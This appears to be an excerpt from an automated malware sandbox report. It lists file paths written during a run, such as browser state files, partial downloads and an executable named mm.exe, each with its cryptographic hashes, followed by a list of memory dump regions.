C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 66ac7ef295f5814c043db1e8d0bfbb3a |
| SHA1 | f2809e78cfbcc01e302b921717dcba13422ab7e3 |
| SHA256 | bb15637330e117684f4ebad0ce4e0802f956c17e8a6fb75bb1002220398226fb |
| SHA512 | 4782c135599c9ed9a884459ace42f319d12679fb10ab30eaf716fdf45c1109059bdbbecc886126b6871f6ea8467f7a92307e35e952db96b31adbbbd554c08c92 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 24e1432bd76ca878f68d2f172a93d8d7 |
| SHA1 | 59ce352023df47949233ef7d7c016b52242199af |
| SHA256 | 5b7735fff83d96ba4c292d35c80b0eefcb00214e99d633ff581110f0ab769f06 |
| SHA512 | fc06d032e13e611825b485360435a9ecffccdcf3e84bbbad784b9c57a262553a9b533a3b0e81d1f0c186dcb800210e8550ec5e36674e9605c4ed5f3400fb8178 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 807419ca9a4734feaf8d8563a003b048 |
| SHA1 | a723c7d60a65886ffa068711f1e900ccc85922a6 |
| SHA256 | aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631 |
| SHA512 | f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c |
C:\Users\Admin\Downloads\Unconfirmed 89513.crdownload
| MD5 | bc8fd990b9c93f3ad12cf1182edc645c |
| SHA1 | 42f8d317c15bad6427ffc63f4e2a34f52d68d6c1 |
| SHA256 | a4db7b7c3ad717682781f6c8eabfd714b573c40a351fd31b26a7eddadff0631a |
| SHA512 | 85b114d0ccc28595faefd1da1566cd45845a6e2db9bb45f357ff609bd34f57a277e93158aec374a24e1a900ebdee124b298d0f10ecb1e34b2f52dc8f11a7b778 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e79aaead465d73b27366b0022114d987 |
| SHA1 | c9083b3cb4ac8f245150241a80c0fd02a3d89edb |
| SHA256 | 2e5aa7ece56dd8f52f29525743a2f3469e3d5dbf98e40a4441548b821943ea3b |
| SHA512 | b5d2583d9d02a8f37bcb28ebda71e6676bf5a017fd95abb060745819f6156b8d63687009ef57c0c93127a55ce53e10b751d41793645b6ad622fbb432c99640d6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 46d2467ecc7588f9c64e5fa7fb08fd77 |
| SHA1 | d939b726a7c458be0cbcb73beec902851d602a3d |
| SHA256 | a4562c37214dce20140f60aa8b05e96300ae2c0087e2a000e69a4dc72f81fa4b |
| SHA512 | 6b1040ccc901f263bacc3d97f10d53768af920c795747264e7e317ed85f14ba6ae99b358eb9daf8e8371d5431ff89460b10ad28ddf7023233a219c7fc55415e0 |
C:\Users\Admin\Downloads\Unconfirmed 871022.crdownload
| MD5 | 1585b761a886295049235a099cc3ddd7 |
| SHA1 | a2e6a8ee6c5722a063ccfee426ccb9b46604d306 |
| SHA256 | b8e814db0eee2eecce9ef6d8f3b21442e9f0cbcda564af6bff7c1a58b8de8347 |
| SHA512 | 952b838d2431fd74660da194b19d5516a275f8a840b06dd0b3dccf322dd2b3682404bdd1fabdbf15a5db62d480177859ea5edfea3cb4701917178ef97ca130b6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b95231eb3312af5159413ab688fdb934 |
| SHA1 | 7610fa9c09b63e026ecf02f3484f1afbd7458dfa |
| SHA256 | 657cf3c19d3f6501179df8be28b49e98065b839b4da285a593db204e22f9d346 |
| SHA512 | fa8bce8c284320fe329cf9e7485f9155279350a21f9738b550af733381c1feb31a1468173def0a62a666763020d66cfa6f8c91f13fbeaa6d9595b169637924da |
C:\Users\Admin\Downloads\Unconfirmed 147682.crdownload
| MD5 | d76e1525c8998795867a17ed33573552 |
| SHA1 | daf5b2ffebc86b85e54201100be10fa19f19bf04 |
| SHA256 | f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd |
| SHA512 | c02e1dcea4dc939bee0ca878792c54ff9be25cf68c0631cba1f15416ab1dabcd16c9bb7ad21af69f940d122b82880b1db79df2264a103463e193f8ae157241dd |
C:\Users\Admin\Downloads\Unconfirmed 329724.crdownload
| MD5 | fb6bf74c6c1f2482e914816d6e97ce09 |
| SHA1 | 44abf440211f399dc9aa3b05748f229d5564227f |
| SHA256 | 8bb649b27fb9c748e283a97c2006e3b5c3c19c55dd4efce2387c65e83c8f5e97 |
| SHA512 | b7cbdea7219bf349a5216ec6447bf6110fa3e6f43bd55cb3e1dabc657bb1fad2fd22de7373e48a2c343573f1fc9d2f6b204d85ccf5e8b26f15de632d57718e2b |
C:\Users\Admin\Downloads\Unconfirmed 371741.crdownload:SmartScreen
| MD5 | 4047530ecbc0170039e76fe1657bdb01 |
| SHA1 | 32db7d5e662ebccdd1d71de285f907e3a1c68ac5 |
| SHA256 | 82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750 |
| SHA512 | 8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e |
C:\Users\Admin\Downloads\Unconfirmed 619887.crdownload
| MD5 | 0095c9d4bc45fed4080e72bd46876efd |
| SHA1 | a180e3ea0439ae13d7b17ac1bc63bb467a6da627 |
| SHA256 | 4806fd64647e02a34dd49f9057c6bf95325dcc923764ff2ef61cbbab40ca8c48 |
| SHA512 | ef30b36c656a0fa1839be8da47dd41553d0df92cad5b4cc3d2d31f6e6060a0a360711df42d8b75eea4900b0ef5c03b161e0bc8f23c850af748b80ba135570875 |
C:\Users\Admin\Downloads\Unconfirmed 812889.crdownload
| MD5 | dd56a69c93908fff71ea1e42d8e8c8f2 |
| SHA1 | cdbc5e5c7f656929f09dd3b258c472dccc09cd54 |
| SHA256 | afceea5beace005b8f3d312c056bc1c99e6fe526db0b58315a8f8b57e90c6366 |
| SHA512 | 910a6871ec716d4a097edd7bbb06492cc3fe87b9386d684c3d43c82ee610954b97168b097253f25eb8a37c5ec3f5ff563475fcb59ff992538143f347d63b1831 |
C:\Users\Admin\Downloads\Unconfirmed 228742.crdownload
| MD5 | 663565b98e9bfe56e575e44b41e2a88b |
| SHA1 | 443f27053a60a6c70b486957cbc58f15b264e412 |
| SHA256 | 83e1698371b7c20f4158752808e3a6772459389752a94c0d2522c08a4ff4d868 |
| SHA512 | 4c155cce7c2ecb2dcd7f5f3c98099b5caf2b9bffef38bf598693fe77288727a469248a5cd96ffd20a1495b2b739e7ac69be70b00dcb6c25cb9443527da30b0b7 |
C:\Users\Admin\Downloads\Unconfirmed 49884.crdownload
| MD5 | 7c22071864896a3046b5c5f10e7d6d60 |
| SHA1 | 63df96dabe5782272167ca19f598b60c7879e526 |
| SHA256 | 3e46af9700d0eca4689a5aaaaa1ef7e694c745f0f7794b657e33944e82b32cae |
| SHA512 | c4d5ececb659a6faeec5d3ab563ac31e09397b3ea4ea5058c6e216c1da9d247e0af427776bf9b50d70e09f0c3308d0753e68a2ec74aad74c158ae2e6660948d0 |
C:\Users\Admin\Downloads\mm.exe
| MD5 | aea08cf88faa7f1a6782e61c0dc8eb6c |
| SHA1 | 08302a20ad29b2aed711381edb0f6ef7a14b67df |
| SHA256 | 13451872a38055328ddb5857cb5ffaae4080d57c92e9038666b6f977e438e47d |
| SHA512 | cfdb5edf0203e950859c29da0c6e0aed3d230d51a1ee878a06359b6b1c41f65c5f5c99fa7b331f098e08a1931389d2565425c2228c6f03b547e5bc6900b5cf77 |
C:\Users\Admin\Downloads\Unconfirmed 545744.crdownload
| MD5 | 199b7988761fdc82f35bdeaa4be7ac4a |
| SHA1 | 1b6d5e0b6b18d4e8f5aff04b660a4abe1dad54c2 |
| SHA256 | 39485c19c17cd4752adb78645bc721d48e6008ce8867602266f033a3a38bdbb8 |
| SHA512 | ac6d30bd0260f52ae75ba97afc933e449c951bad6abf5629e14f70933e3d3160ebbab6ce5f32e9d0401a89c030172f4197d97101c47a1d387024bd897490d6d3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 63fb8aecc31f979088ce5199048c8671 |
| SHA1 | 492843cbe582512fc107a9b385bf6e669041f0cf |
| SHA256 | 8d6fe85f51d9898362805116b5394b7909b8c205a5c6858a8d172d814426438f |
| SHA512 | abdc26c827865e3a8df3352e608b08ef733704c18ee672382786b63fbbb8d6b683a8e2e253c6ae4b46dcafd8a0c429968645a47c47b24a3062c65d8d99f2855f |
memory/492-325-0x000001CE79D10000-0x000001CE79D32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eudwqjpd.iub.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/492-326-0x00007FF9554B0000-0x00007FF955F71000-memory.dmp
memory/492-327-0x000001CE619D0000-0x000001CE619E0000-memory.dmp
memory/492-328-0x000001CE619D0000-0x000001CE619E0000-memory.dmp
memory/492-329-0x000001CE619D0000-0x000001CE619E0000-memory.dmp
memory/492-332-0x00007FF9554B0000-0x00007FF955F71000-memory.dmp
memory/5048-361-0x0000000000400000-0x0000000000413000-memory.dmp
memory/4940-371-0x0000000010000000-0x000000001001B000-memory.dmp
memory/3312-384-0x0000000000400000-0x0000000000B86000-memory.dmp
memory/3312-383-0x00007FF976B30000-0x00007FF976B32000-memory.dmp
memory/3312-388-0x0000000000400000-0x0000000000B86000-memory.dmp
memory/1268-390-0x0000000000400000-0x0000000000B86000-memory.dmp
memory/1268-395-0x0000000000400000-0x0000000000B86000-memory.dmp
memory/2648-404-0x00007FF691140000-0x00007FF69163E000-memory.dmp
memory/2648-405-0x00007FF976B30000-0x00007FF976B32000-memory.dmp
memory/2648-409-0x00007FF691140000-0x00007FF69163E000-memory.dmp
memory/844-425-0x0000000140000000-0x0000000140004278-memory.dmp
memory/844-462-0x0000000140000000-0x0000000140004278-memory.dmp